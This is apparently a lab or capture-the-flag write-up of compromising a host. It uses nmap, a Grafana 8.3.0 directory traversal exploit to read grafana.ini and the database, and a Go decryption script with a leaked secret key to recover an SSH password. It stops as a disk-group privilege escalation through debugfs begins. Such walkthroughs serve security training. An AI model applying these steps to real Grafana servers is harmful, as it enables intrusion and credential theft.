$ nmap -p- --min-rate 3000 -Pn 192.168.208.181
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-21 16:49 +08
Warning: 192.168.208.181 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.208.181
Host is up (0.18s latency).
Not shown: 65412 closed tcp ports (conn-refused), 121 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Grafana LFI + Decrypt Password -> SSH Creds
Port 3000 was running Grafana:
This particular version had an LFI exploit:
$ searchsploit grafana 8.3.0
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Grafana 8.3.0 - Directory Traversal and Arbitrary File Rea | multiple/webapps/50581.py
----------------------------------------------------------- ---------------------------------
I verified that it works:
Since we don't have Grafana credentials, let's try to read it at /etc/grafana/grafana.ini. I found this within the configuration files:
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
;admin_password = admin
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
# Path to where grafana can store temp files, sessions, and the sqlite3 db (if that is used)
;data = /var/lib/grafana
# For "sqlite3" only, path relative to data_path setting
;path = grafana.db
We can attempt to read the Grafana database from that folder. I copied the output to a file, and checked for instances of admin:
This was an encoded password. Googling how to decrypt this led me to another Github repository:
To abuse this, replace the secret Key and encrypted password within the script:
var grafanaIni_secretKey = "SW2YcwTIb9zpOOhoPsMm"
var dataSourcePassword = "anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w=="
Afterwards, make sure that go has the golang.org/x/crypto/pbkdf2@latest module installed. This would let us decrypt the password:
With the password, I tested Grafana and SSH, and it worked for the sysadmin user:
Privilege Escalation
Disk Group -> Read SSH Key
We are part of the disk group, meaning we actually have full access to the file system through debugfs. First, let's check the different devices available:
